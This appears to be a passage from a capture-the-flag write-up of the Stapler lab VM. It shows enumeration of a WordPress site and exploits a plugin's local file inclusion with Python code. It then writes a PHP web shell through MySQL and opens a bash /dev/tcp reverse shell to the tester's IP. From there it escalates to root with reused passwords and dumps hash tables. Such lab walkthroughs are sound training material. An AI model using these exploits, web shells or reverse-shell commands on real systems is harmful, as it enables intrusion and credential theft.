<span class="red ">[!]</span> Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://wpvulndb.com/vulnerabilities/8905
<span class="blue ">[i]</span> Fixed in: 4.7.5
<span class="red ">[!]</span> Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41398
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
<span class="blue ">[i]</span> Fixed in: 4.2.16
<span class="red ">[!]</span> Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41457
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
<span class="blue ">[i]</span> Fixed in: 4.2.16
<span class="red ">[!]</span> Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
Reference: https://twitter.com/ircmaxell/status/923662170092638208
Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
<span class="blue ">[i]</span> Fixed in: 4.2.17
<span class="red ">[!]</span> Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
<span class="blue ">[i]</span> Fixed in: 4.2.18
<span class="red ">[!]</span> Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
<span class="blue ">[i]</span> Fixed in: 4.2.18
<span class="red ">[!]</span> Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
<span class="blue ">[i]</span> Fixed in: 4.2.18
<span class="red ">[!]</span> Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
<span class="blue ">[i]</span> Fixed in: 4.9.2
<span class="red ">[!]</span> Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
<span class="green ">[+]</span> WordPress theme in use: bhost - v1.2.9
<span class="green ">[+]</span> Name: bhost - v1.2.9
| Last updated: 2018-01-10T00:00:00.000Z
| Location: https://10.0.133.27:12380/blogblog/wp-content/themes/bhost/
| Readme: https://10.0.133.27:12380/blogblog/wp-content/themes/bhost/readme.txt
<span class="yellow ">[!]</span> The version is out of date, the latest version is 1.4.0
| Style URL: https://10.0.133.27:12380/blogblog/wp-content/themes/bhost/style.css
| Theme Name: BHost
| Theme URI: Author: Masum Billah
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
| Author: Masum Billah
| Author URI: http://getmasum.net/
<span class="green ">[+]</span> Enumerating plugins from passive detection ...
<span class="green ">[+]</span> No plugins found
<span class="green ">[+]</span> Enumerating usernames ...
<span class="green ">[+]</span> Identified the following 16 user/s:
+----+---------+-----------------+
| Id | Login | Name |
+----+---------+-----------------+
| 1 | john | John Smith |
| 2 | elly | Elly Jones |
| 3 | peter | Peter Parker |
| 4 | barry | Barry Atkins |
| 5 | heather | Heather Neville |
| 6 | garry | garry |
| 7 | harry | harry |
| 8 | scott | scott |
| 9 | kathy | kathy |
| 10 | tim | tim |
| 11 | zoe | ZOE |
| 12 | dave | Dave |
| 13 | simon | Simon |
| 14 | abby | Abby |
| 15 | vicki | Vicki |
| 16 | pam | Pam |
+----+---------+-----------------+
<span class="green ">[+]</span> Finished: Thu Mar 29 18:02:11 2018
<span class="green ">[+]</span> Requests Done: 67
<span class="green ">[+]</span> Memory used: 55.98 MB
<span class="green ">[+]</span> Elapsed time: 00:00:04
</pre>
Wordpress user registration is enabled but passwords are emailed as part of the process so it is not possible to complete registration and there by possibly gain some privilege on the wordpress installation.
phpMyAdmin
^^^^^^^^^^
Is available at https://10.0.133.27:12380/phpmyadmin/
.. image:: ./images/stapler/Stapler_phpmyadmin.png
:alt: Stapler_phpmyadmin
grepping the source of the login page for the string "ver" reveals a possible version number for phpMyAdmin of "4.5.4.1deb2ubuntu1"
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># curl -sk https://10.0.133.27:12380/phpmyadmin/index.php | grep -i ver
PMA_commonParams.setAll({common_query:"?lang=en&collation_connection=utf8_unicode_ci&token=8ddf009ed66a66bd7da4616c09f810b1",opendb_url:"db_structure.php",safari_browser:"0",collation_connection:"utf8_unicode_ci",lang:"en",server:"1",table:"",db:"",token:"8ddf009ed66a66bd7da4616c09f810b1",text_dir:"ltr",show_databases_navigation_as_tree:"1",pma_absolute_uri:"https://10.0.133.27:12380/phpmyadmin/",pma_text_default_tab:"Browse",pma_text_left_default_tab:"Structure",pma_text_left_default_tab2:"",LimitChars:"50",pftext:"",confirm:"1",LoginCookieValidity:"1440",logged_in:"",<span class="hll">PMA_VERSION:"4.5.4.1deb2ubuntu1"</span>,auth_type:"cookie"});
</div> <input type="hidden" name="server" value="1" /></fieldset>
</pre>
It should be possible to login to phpMyAdmin using a valid MySQL user account but since MySQL remote CLI access is enabled this is not overly useful.
Plan of attack
==============
From the information gathered during the enumeration phase it seems likely that a brute force attack, with a custom word list, may succeed against the host however such an attack is noisy and inelegant.
Given an LFI vulnerability exists it should be possible to obtain the output of sensitive configuration or system files which may give us plain text (database credentials in wp-config.php) or encrypted passwords (/etc/shadow).
After gaining a shell on the host, either by cracking a local user account password or gaining RCE, another round of enumeration will hopefully lead to full system compromise.
Exploitation
============
Using LFI exploit to obtain database user password
--------------------------------------------------
The "WordPress Plugin Advanced Video 1.0 - Local File Inclusion" exploits proof of concept (PoC) code is not capable of connecting to https websites. :strike:`This could be easily fixed but after examining the way the exploit works and discovering that the LFI URL would and could not be returned its quicker to just run the exploit manually.`
.. code-block:: python
:linenos:
import random
import urllib2
import re
url = "http://127.0.0.1/wordpress" # insert url to wordpress
randomID = long(random.random() * 100000000000000000L)
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
for line in content:
numbers = re.findall(r'\d+',line)
id = numbers[-1]
id = int(id) / 10
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
for line in content:
if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
urls=re.findall('"(https?://.*?)"', line)
print urllib2.urlopen(urls[0]).read()
WordPress Plugin Advanced Video 1.0 - Local File Inclusion
`<https://www.exploit-db.com/exploits/39646/>`_
- line 4: begins to build the URL to the wordpress target website (https://10.0.133.27:12380/blogblog/ in our case)
- line 6: generates a random 17 digit integer to later use as post title (random number between 0.0-1 * 100000000000000000, L just represents long integer type and is only present in older version of python). The title is not relevant to the exploit.
- line 9: sends a http request to the built URL and creates "objHtml" which contains the data returned.
- lines 11-14: read through each line of content, use regex ('\d+' match any number of digits) in the output, find the last element of the list returned by the regex and divide the number by 10. This gives the post id of the article created by the exploit.
- lines 16-22: request the post id retrieved above from the wordpress target. Then loops through the response looking for lines that contain "attachment-post-thumbnail size-post-thumbnail wp-post-image". These lines would normally contain the URL to the thumbnail image for the article. The exploit stores the LFI content in the thumbnail image (more on this later)
The exploit can be triggered by using ``curl`` to request the following URL manually:
"https://10.0.133.27:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=blahblah&short=blah&term=blah&thumb=../wp-config.php"
Example ``curl`` request for a file that should exist:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># exitcurl -k "https://10.0.133.27:12380/blogblog/wp-admin/admin-ajax.php?action=hp"ishPost&title=blahblah&short=blah&term=blah&thumb=../wp-config.ph
https://10.0.133.27:12380/blogblog/?p=210
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span>#
</pre>
In this case the URL to article created by the exploit is returned (remember value for p needs to be divided by 10)
Visiting https://10.0.133.27:12380/blogblog/?p=21:
.. image:: ./images/stapler/Stapler_exploit_article.png
:alt: Stapler exploit article
The thumbnail image in which the contents of the LFI exists, or link to it, is not included in this page. The URL to the thumbnail is however included on the main view (index.php) of the website (blog view @TODO find proper name of view in wp-admin).
.. image:: ./images/stapler/Stapler_exploit_article_thumb_url.png
:alt: Stapler exploit article thumb url
https://10.0.133.27:12380/blogblog/wp-content/uploads/352594244.jpeg is the file that includes the LFI content in the above case.
Example ``curl`` request for a non-existent file:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># curl -k "https://10.0.133.27:12380/blogblog//wp-admin/admin-ajax.php?action=ave" t;""e=1234567890&short=rnd&term=rnd&thumb=../wp-config.p
x"i"s"t"."w"r"o"n"g"lnhub/stapler</span># e"quot;-"
<span class="hll"><br />
<b>Warning</b>: file_get_contents(../i-do-not-exist.wrong): failed to open stream: No such file or directory in <b>/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/classes/class.avePost.php</b> on line <b>78</b><br /></span>
https://10.0.133.27:12380/blogblog/?p=230<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span>#
</pre>
Although it appears the local file we tried to include using the exploit wasn't found the error message returned is helpful to us in understanding how the exploit works.
The full path to the doc root for the website "/var/www/https/blogblog/" is learned.
The php function ``file_get_contentsis()`` is being called in ``class.avePost.php`` to retrieve the content from the path set in the request array ``$_REQUEST['thumb']`` (the ``thumb=`` GET parameter).
.. code-block:: php
:linenos:
:emphasize-lines: 22,23,30
<?php
function ave_publishPost(){
$title = $_REQUEST['title'];
$term = $_REQUEST['term'];
$thumb = $_REQUEST['thumb'];
$short = $_REQUEST['short'];
$id = $_REQUEST['id'];
$type = $_REQUEST['type'];
$user_id = get_current_user_id();
if($title == '' || $short == '' || $term == '' || $thumb == ''){
echo 'ERROR';
} else {
$post = array(
//'ID' => $car->VehicleRecordID,
'post_title' => $title,
'post_content' => $short,
'post_status' => 'publish',
'post_author' => $user_id,
'post_type' => $type
);
$post_id = wp_insert_post($post);
$filename = rand().".jpeg";
$image_data = file_get_contents($thumb);
$parent_post_id = $post_id;
$upload_dir = wp_upload_dir();
if(wp_mkdir_p($upload_dir['path']))
$file = $upload_dir['path'] . '/' . $filename;
else
$file = $upload_dir['basedir'] . '/' . $filename;
file_put_contents($file, $image_data);
$wp_filetype = wp_check_filetype($filename, null );
$attachment = array(
'post_mime_type' => $wp_filetype['type'],
'post_title' => sanitize_file_name($filename),
'post_content' => '',
'post_status' => 'inherit'
);
$attach_id = wp_insert_attachment( $attachment, $file, $parent_post_id );
require_once(ABSPATH . 'wp-admin/includes/image.php');
$attach_data = wp_generate_attachment_metadata( $attach_id, $file );
wp_update_attachment_metadata( $attach_id, $attach_data );
set_post_thumbnail( $parent_post_id, $attach_id );
$suggestion_term = $term;
$taxonomy = 'category'; // The name of the taxonomy the term belongs in
wp_set_post_terms( $post_id, array($suggestion_term), $taxonomy );
echo site_url().'/?p='.$post_id;
}
}
?>
- line 22: set ``$filename`` by generating a random number and appending .jpeg
- line 23: use php's ``file_get_contents()`` function to read the contents of a file specified by ``$thumb``, a GET variable under our control, into ``$image_data``
- lines 26-29: determine the path to the directory in which the thumbnail file will be stored and appends it to ``$filename``
- line 30: uses php's ``file_put_contents()`` function to write the string ``$image_data`` (which contains the LFI data) into ``$file`` (a file with a jpeg extension and random name and wp-content/uploads in this case).
No checks are made in the Advanced Video Embed plugin to determine whether a request sent to the plugin is from an authorized user allowing anyone to create new posts. Also no mime type checks are done against the file specified in ``$thumb`` so any file type can be exfiltrated.
Fixing the exploit to work with Stapler
---------------------------------------
What follows is some very "hacky" python code which re-writes the original exploit to work with https URL's, extract the URL of the image file the LFI is written to and display it.
.. code-block:: python
:linenos:
import sys
import random
import urllib2
import re
import ssl
from bs4 import BeautifulSoup
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Take first arg from stdin as path to LFI
if len(sys.argv) > 1:
lfi = sys.argv[1]
else:
lfi = "wp-config.php"
url = "https://10.0.133.27:12380/blogblog" # insert url to wordpress
randomID = long(random.random() * 100000000000000000L)
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../' + lfi, context=ctx)
for line in objHtml:
numbers = re.findall(r'\d+',line)
id = numbers[-1]
id = int(id) / 10
# Fetch the main blog page
objHtml = urllib2.urlopen(url, context=ctx)
soup = BeautifulSoup(objHtml, 'html.parser')
# Use BeatuifulSoup to extract the div with id of the post created by the LFI
soup = soup.find(id="post-" + str(id))
# Extract the image URL from the above div
soup = soup.find('img')['src']
# Fetch the image URL and write its contents to std out
lfi = urllib2.urlopen(soup, context=ctx)
for line in lfi:
sys.stdout.write(line)
Testing the modified exploit
----------------------------
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># python 39646.py ../../../../../etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
</pre>
The exploit works and the contents of lsb-release is returned.
LFI wp-config.php
-----------------
Credentials for the MySQL root user are revealed!
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># python 39646.py
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
<span class="hll">define('DB_NAME', 'wordpress');</span>
/** MySQL database username */
<span class="hll">define('DB_USER', 'root');</span>
/** MySQL database password */
<span class="hll">define('DB_PASSWORD', 'plbkac');</span>
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
</pre>
LFI /etc/passwd
---------------
Contents of /etc/passwd piped to grep to remove users without shell access
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># python 39646.py ../../../../../etc/passwd | grep -v "false\|nologin"
root:x:0:0:root:/root:/bin/zsh
sync:x:4:65534:sync:/bin:/bin/sync
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
elly:x:1029:1029::/home/elly:/bin/bash
</pre>
Gain command execution using MySQL
----------------------------------
The path to the wordpress websites webroot was learned earlier when testing the LFI exploit; "/var/www/https/blogblog/", deeper directories can be inferred by browsing the website and paths with directory listing enabled, e.g. "wp-content/plugins".
The MySQL root user credentials were obtained from the wp-config.php file.
Since port 3306 is open and remote authenticated access is permitted in the MySQL servers configuration all the information necessary to login and run SQL commands to create files in web accessible directories is known.
Connect to MySQL CLI on Stapler as root and use a SELECT query and INTO OUTFILE to write a `phpinfo()` file to disk:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># mysql -h 10.0.133.27 -u root -pplbkac
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT "<?php phpinfo();?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/phpinfo.php";
Query OK, 1 row affected (0.00 sec)
</pre>
Visiting the URL to the phpinfo.php (https://10.0.133.27:12380/blogblog/wp-content/uploads/phpinfo.php) displays the output of phpinfo() indicating that code execution was successfully gained on Stapler. |br|
The webshell will run under the www-data user who's shell is set to `/usr/sbin/nologin` however reading through other users entries in `/etc/passwd` it appears that bash shell is available on the system.
PHP's `exec()` function was used rather than `shell_exec()` to first execute a bash shell and from within that shell a reverse shell connection was made using bash's virtual tcp device.
The output of `phpinfo()` was checked to ensure that the `exec()` function was not disabled.
Write a web shell to disk using the same method as above:
.. raw:: html
<pre class="terminal">
mysql> SELECT "<?php echo exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.00 sec)
</pre>
Test the web shell by supplying `id` as the $cmd GET variable:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># curl -k https://10.0.133.27:12380/blogblog/wp-content/uploads/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
It works!
Now start a netcat listener to receive and send a command to create a reverse shell `/bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.133.6/443 0>&1'`:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># nc -lnvp 443
listening on [any] 443 ...
</pre>
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># curl -k -G "https://10.0.133.27:12380/blogblog/wp-content/uploads/shell.php" --data-urlencode "cmd=/bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.133.6/443 0>&1'"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
A reverse shell connects back:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># nc -lnvp 443
listening on [any] 443 ...
connect to [10.0.133.6] from (UNKNOWN) [10.0.133.27] 45660
bash: cannot set terminal process group (31387): Inappropriate ioctl for device
bash: no job control in this shell
www-data@red:/var/www/https/blogblog/wp-content/uploads$
</pre>
Spawn an interactive shell using python:
.. raw:: html
<pre class="terminal">
www-data@red:/var/www/https/blogblog/wp-content/uploads$ python -c 'import pty; pty.spawn("/bin/bash")'
</blogblog/wp-content/uploads$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$
</pre>
Privilege escalation
====================
`ls -la /home` shows that everyone has read permissions set on each users home directory, cat was used to list the contents of each users `.bash_history` file for sensitive information
.. raw:: html
<pre class="terminal">
www-data@red:/home$ cat /home/*/.bash_history
cat /home/*/.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
<span class="hll">sshpass -p thisimypassword ssh JKanode@localhost</span>
apt-get install sshpass
<span class="hll">sshpass -p JZQuyIN5 peter@localhost</span>
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
exit
exit
exit
exit
id
exit
top
ps aux
exit
exit
exit
exit
cat: /home/peter/.bash_history: Permission denied
top
exit
</pre>
Passwords for JKanode and peter's user accouns are discovered.
peter has full sudo privileges on Stapler:
.. raw:: html
<pre class="terminal">
red% sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter: JZQuyIN5
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
<span class="hll">(ALL : ALL) ALL</span>
</pre>
Privilege escalation to root is as simple as `su - peter` and running `sudo su -` under peters account.
.. raw:: html
<pre class="terminal">
www-data@red:/var/www/https/blogblog/wp-content/uploads$ su - peter
su - peter
Password: JZQuyIN5
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q) Quit and do nothing. The function will be run again next time.
(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.
(1) Continue to the main menu.
(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).
--- Type one of the keys in parentheses ---
^J
Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red% sudo su -
sudo su -
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter: JZQuyIN5
<span class="green bold">➜</span> <span class="cyan bold">~</span> id
id
uid=0(root) gid=0(root) groups=0(root)
<span class="green bold">➜</span> <span class="cyan bold">~</span> cat /root/flag.txt
cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
</pre>
Alternative Methods for initial shell
=====================================
Targeted Brute forcing SSH passwords
------------------------------------
Create a user list from exfiltrated /etc/passwd file:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># grep -v "nologin\|false" passwd.txt | cut -d ":" -f 1 > userlist.txt
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span># cat userlist.txt
root
sync
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
CCeaser
JKanode
CJoo
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
www
elly
</pre>
Building a wordlist from the wordpress websites using cewl:
.. raw:: html
<pre class="terminal">
<span class="red bold ">root@kali</span>:<span class="blue bold ">~/vulnhub/stapler</span>#
</pre>
Dump the wordpress password hashes from the wp_users table:
.. raw:: html
<pre class="terminal">
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| 1 | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john | john@red.localhost | http://localhost | 2016-06-03 23:18:47 | | 0 | John Smith |
| 2 | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly | Elly@red.localhost | | 2016-06-05 16:11:33 | | 0 | Elly Jones |
| 3 | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter | peter@red.localhost | | 2016-06-05 16:13:16 | | 0 | Peter Parker |
| 4 | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry | barry@red.localhost | | 2016-06-05 16:14:26 | | 0 | Barry Atkins |
| 5 | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather | heather@red.localhost | | 2016-06-05 16:18:04 | | 0 | Heather Neville |
| 6 | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry | garry@red.localhost | | 2016-06-05 16:18:23 | | 0 | garry |
| 7 | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry | harry@red.localhost | | 2016-06-05 16:18:41 | | 0 | harry |
| 8 | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott | scott@red.localhost | | 2016-06-05 16:18:59 | | 0 | scott |
